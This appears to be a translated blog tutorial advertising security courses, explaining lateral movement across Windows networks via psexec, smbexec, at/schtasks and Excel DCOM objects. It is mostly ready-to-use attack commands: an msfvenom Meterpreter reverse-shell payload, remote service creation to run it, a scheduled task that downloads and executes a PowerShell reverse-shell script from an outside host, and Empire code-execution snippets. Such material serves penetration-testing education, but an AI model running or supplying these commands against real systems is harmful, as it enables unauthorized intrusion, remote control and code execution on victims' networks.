movement in the attacked network
Hacking infrastructure, from the point of view of hacking theory, consists of several steps. So, at the beginning, the attacker needs to conduct reconnaissance, find out which DNS records, IP address pools, etc. belong to the attacked organization. It would also be a good idea to find out what software and security tools are used. All this can make hacking much easier.
After successfully penetrating the victim's network, the hacker needs to gain a foothold; to do this, the attacker creates a hidden channel into the hacked network. This could be the use of encapsulating the desired data in a common type of packet, using common ports, steganography, and much more. Also, if a hacker does not have enough rights, then he needs to elevate privileges.
Finally, having successfully established a foothold in the network and received the necessary rights, the hacker can begin horizontal movement—moving through the network from the entry point (for example, a compromised device or account) to other objects. This is the topic we will consider in this article.
Winda as a springboard
In most organizations today, the main user OS for now is Windows. Therefore, in this article we will look at horizontal movement on a Windows-based network.
Let's start by looking at one of the most common methods of movement – using psexec. The Microsoft website describes the utility as follows: “PsExec is a lightweight telnet replacement that allows you to run processes on other systems with full interoperability for console applications without manually installing client software.”
Psexec uses the SMB protocol to operate. The utility moves a previously created copy of the PsExesvc.exe file to the ADMIN$ network folder. Then a service is created via RPC, which, in turn, launches PsExesvc.exe on the attacked host.
As a result, the file creates a Named Pipe through which it communicates with the attacker's node. After completion of work, the service stops and the file is deleted from the attacked machine.
In order to carry out this attack in practice, we will use Kali Linux, and first we will prepare a payload with reverse_https using Msfvenom.
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.1.105 lport=443 -f exe > shell.exe
Next, we copy the executable file to the ADMIN$ share, although it can be placed anywhere in the file system, where it will remain hidden.
After that, using the sc command, which allows you to query, create and delete Windows services remotely, a service is created, for example named “meterpreter”, which points to the downloaded executable file.
sc create Meterpreter binPath= "shell.exe"
sc start Meterpreter
The last step involves starting the service, which will result in an error due to the fact that the file created is not a genuine service file and does not return the expected response code. The fact is that Windows service files have a slightly different format and must be launched in a special way. But in this case, this error is unimportant, since the main goal is to execute our file.
Smbexec as an alternative
Smbexec is a tool used to remotely execute commands on Windows systems, similar to Psexec but avoids placing any malicious files on the target system. It works by creating a temporary service on the target machine to execute commands through cmd.exe, without removing any binaries. Although it uses a stealth approach, the tool generates event logs for every command executed, offering a sort of non-interactive “shell”.
So, the command to connect using Smbexec looks like this:
smbexec.py WORKGROUP/user:password@192.168.1.1
An important advantage of Smbexec is that it allows commands to be executed directly through the service, eliminating the need for physical executable files on the target machine.
This method is useful for executing one-time commands on Windows. For example, pairing it with a module web_delivery from Metasploit allows you to run a Meterpreter payload targeting PowerShell.
By creating a remote service on the attacker's machine with the specified binPath to run the provided command via cmd.exe, the payload can be successfully executed.
Here you can create and start a service using the following commands:
sc create [ServiceName] binPath= "cmd.exe /c [PayloadCommand]"
sc start [ServiceName]
Using At and Schtasks
The At command in Windows operating systems allows you to schedule tasks on hosts where you know the username/(password/hash). Thus, at can also help us execute commands on other hosts.
Here we can use the task scheduler to schedule the execution of this task at a certain time. For example:
At \\victim 11:00:00PM shutdown –r
As a result, we can start executing a pre-loaded executable file on the victim's machine. It cannot be said that this command, like the schtasks described below, provides significant advantages when used in terms of hiding activity. But this is a standard utility that is available in any version of the OS and, accordingly, it can also be used to launch applications.
The operating principle of the schtasks utility is similar. But here we need to first create a task and then call it:
schtasks /create /n <TASK_NAME> /tr C:\path\shell.exe /sc once /st 00:00 /S <VICTIM> /RU System
schtasks /run /tn <TASK_NAME> /S <VICTIM>
In the example below, we also first create a task that involves running powershell code that downloads a script from another resource. Then the created task is launched for execution.
schtasks /create /S dcorp-dc.domain.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "MyNewtask" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/InvokePowerShellTcp.ps1''')'"
schtasks /run /tn "MyNewtask" /S dcorp-dc.domain.local
Using Excel DCOM objects
If previous methods of Lateral Movement were somehow related to the use of OS commands, now we will look at the use of Excel DCOM objects. The Distributed Component Object Model (DCOM) is an extension of the Component Object Model (COM) standard to support communication between objects on different computers over a network.
The Empire Project provides a PowerShell script that demonstrates using Excel for remote code execution (RCE) by manipulating DCOM objects. Below are script snippets available in the Empire repository on GitHubdemonstrating different methods of using Excel for RCE:
# Определяем версию MS Office
elseif ($Method -Match "DetectOffice") {
$Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
$Obj = [System.Activator]::CreateInstance($Com)
$isx64 = [boolean]$obj.Application.ProductCode[21]
Write-Host $(If ($isx64) {"Office x64 detected"} Else {"Office x86 detected"})
}
# Регистрация XLL
elseif ($Method -Match "RegisterXLL") {
$Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
$Obj = [System.Activator]::CreateInstance($Com)
$obj.Application.RegisterXLL("$DllPath")
}
# Выполнение команд через Excel DDE
elseif ($Method -Match "ExcelDDE") {
$Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
$Obj = [System.Activator]::CreateInstance($Com)
$Obj.DisplayAlerts = $false
$Obj.DDEInitiate("cmd", "/c $Command")
}This way we can use Excel to execute third party commands.
Conclusion
Lateral Movement is an integral part of any successful hack. In order to move between systems, an attacker needs to be able to execute his code on other systems, and we discussed several methods for such movement in this article.
OTUS experts talk more about information security tools and methods in practical online courses. You can view the full catalog of courses via the link.
And for those who are interested in the topic of government regulation mechanisms in information security, I recommend attending the open lesson on October 24. Here you will get acquainted with the mechanisms of state regulation in information security: licensing, accreditation, certification and certification. You will understand how to apply this knowledge in your work to comply with legal requirements. You can sign up here.
